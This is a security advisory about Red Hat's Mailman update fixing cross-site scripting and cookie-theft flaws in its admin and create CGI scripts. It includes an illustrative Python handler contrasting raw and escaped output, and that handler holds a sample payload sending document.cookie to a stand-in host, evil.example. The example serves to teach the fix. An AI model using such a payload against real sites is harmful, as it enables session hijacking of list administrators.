Red Hat recommends updating the Mailman package included in several versions of its Linux operating system to correct vulnerabilities that could allow remote cross-site scripting and denial of service attacks.
Mailman is a program for managing mailing lists and is shipped with Red Hat's Linux operating system under a GNU General Public License. Mailman has several vulnerabilities.
One flaw, in the admin CGI script of Mailman versions before 2.1.4, is a cross-site scripting bug: a remote attacker who gets a list administrator to follow a crafted link can steal the administrator's session cookie and then carry out unauthorized actions on the list. This could also lead to a denial of service.
A second flaw, in the create CGI script of Mailman 2.1.x versions before 2.1.3, likewise lets a remote attacker steal cookies.
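To show the bug class behind both flaws above, here is an added example (not Mailman's code, and not a claim about how its admin or create scripts were written): a CGI-style handler that reflects a request parameter into its HTML error page. The parameter name, script shape and cookie-stealing payload are assumptions chosen for illustration. The vulnerable version interpolates the value raw, so a victim following the attacker's link runs the injected script under the origin that holds the session cookie; the fixed version escapes the value first.

```python
"""
Reflected XSS in a CGI script, vulnerable pattern beside the fix.
Added example only: not Mailman's code; names and payload are assumptions.
"""
from html import escape
from urllib.parse import parse_qs

# Constructed sample query strings: one benign, one carrying a script payload
# in the 'listname' parameter that the page reflects into its output.
# (%2B is '+', so the payload concatenates document.cookie onto the URL.)
BENIGN_QUERY = "listname=announce"
ATTACK_QUERY = ("listname=<script>document.location='http://evil.example/?c='"
                "%2Bdocument.cookie</script>")


def listname_from(query_string):
    """Return the 'listname' parameter of a CGI QUERY_STRING ('' if absent)."""
    params = parse_qs(query_string, keep_blank_values=True)
    return params.get("listname", [""])[0]


def error_page_vulnerable(query_string):
    """Pre-fix pattern: the user-controlled value is interpolated raw.

    Whatever the attacker places in the URL becomes part of the page, so a
    victim's browser parses and executes the injected <script>.
    """
    name = listname_from(query_string)
    return "<html><body><h1>No such list: %s</h1></body></html>" % name


def error_page_fixed(query_string):
    """Fixed pattern: HTML-escape before interpolating.

    escape() turns <, >, &, and quotes into entities, so the payload is
    rendered as text and never parsed as markup.
    """
    name = listname_from(query_string)
    return ("<html><body><h1>No such list: %s</h1></body></html>"
            % escape(name, quote=True))


def contains_injected_script(page):
    """Check helper: True if a raw <script> tag survived into the output."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    for label, render in (("vulnerable", error_page_vulnerable),
                          ("fixed", error_page_fixed)):
        page = render(ATTACK_QUERY)
        print("%-10s script injected: %s" % (label, contains_injected_script(page)))
```

Escaping on output is the fix that matters here; marking the session cookie HttpOnly is a useful defense in depth against the cookie-theft payload, but it does not stop the script from acting on the victim's behalf while the page is open.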
Mailman has suffered from other cross-site scripting problems in the past. The current vulnerabilities affect Red Hat Linux Advanced Server 2.1 for Itanium, Red Hat Enterprise Linux ES 2.1 and Red Hat Enterprise Linux AS 2.1; updated packages are available from Red Hat.